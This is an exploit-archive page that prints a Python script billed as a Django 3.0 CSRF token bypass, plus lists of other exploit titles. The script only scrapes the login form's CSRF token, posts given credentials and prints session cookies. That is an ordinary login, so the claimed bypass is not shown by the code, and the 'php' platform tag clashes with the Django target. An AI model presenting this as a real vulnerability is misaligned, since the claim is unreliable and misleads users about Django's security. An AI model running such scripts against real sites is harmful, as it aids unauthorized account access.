Search for hundreds of thousands of exploits

"Django 3.0 - Cross-Site Request Forgery Token Bypass"

Author

Exploit author

"Spad Security Group"

Platform

Exploit platform

php

Release date

Exploit published date

2020-04-08

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass
# Date: 2020-04-08
# Exploit Author: Spad Security Group
# Vendor Homepage: https://www.djangoproject.com/
# Software Link: https://pypi.org/project/Django/
# Version: 3.0 =<
# Tested on: windows 10
# Language: python3.8

# t.me/SpadSec
# Spad Security Group


from requests import Session
import sys
from bs4 import BeautifulSoup
from time import sleep
from colorama import Fore, Style
from random import choice
from os import name, system

colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW]


def cleaner():
    if name == "nt":
        system("cls")
    else:
        system("clear")

def logo_printer():
    cleaner()
    logo = r"""
     \_______/
 `.,-'\_____/`-.,'
  /`..'\ _ /`.,'\
 /  /`.,' `.,'\  \
/__/__/     \__\__\__
\  \  \     /  /  /
 \  \,'`._,'`./  /
  \,'`./___\,'`./
 ,'`-./_____\,-'`.
     /       \
    """
    _logo_enumer = 0
    for char in logo:
        sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}")
        sys.stdout.flush()
        _logo_enumer +=1
        sleep(0.005)
    print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec")

class DjangoCsrfMiddleWareBypass:
    def __init__(self, url: str, username: str, password: str):
        self.url = url
        self.username = username
        self.password = password
        logo_printer()
        self.cookies = {}
        self.session = Session()
        self.bypass()
    
    def spad_printer(self, string):
        print("\n")
        for char in string:
            sys.stdout.write(char)
            sys.stdout.flush()
            sleep(0.05)

    def bypass(self):
        global colors
        _conn = self.session.get(self.url)
        self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}")
        self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...")
        for key, value in _conn.cookies.items():
            self.cookies[key] = value
        self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!")

        soup = BeautifulSoup(_conn.text, "lxml")
        csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
        self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}")

        login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies)
        if len(login.history) >= 2:
            if login.history[1].is_redirect:
                self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in")
            else:
                self.spad_printer("[-] Error")
        else:
            if login.history:
                if login.history[0].is_redirect:
                    self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}")
                    for key, value in self.session.cookies.items():
                        self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}")
                else:
                    self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
            else:
                self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")

if __name__ == "__main__":
    try:
        url = sys.argv[1]
        username = sys.argv[2]
        password = sys.argv[3]
        DjangoCsrfMiddleWareBypass(url, username, password)
    except IndexError:
        logo_printer()
        for char in f"[!] python {sys.argv[0]} http://google.com username password":
            sys.stdout.write(char)
            sys.stdout.flush()
            sleep(0.05)
Release DateTitleTypePlatformAuthor
2020-07-06"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"webappsmultiple"Jakub Palaczynski"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Özeser"
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
Release DateTitleTypePlatformAuthor
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Özeser"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-26"OpenEMR 5.0.1 - 'controller' Remote Code Execution"webappsphp"Emre ÖVÜNÇ"
Release DateTitleTypePlatformAuthor
2020-04-08"Django 3.0 - Cross-Site Request Forgery Token Bypass"webappsphp"Spad Security Group"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48303/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.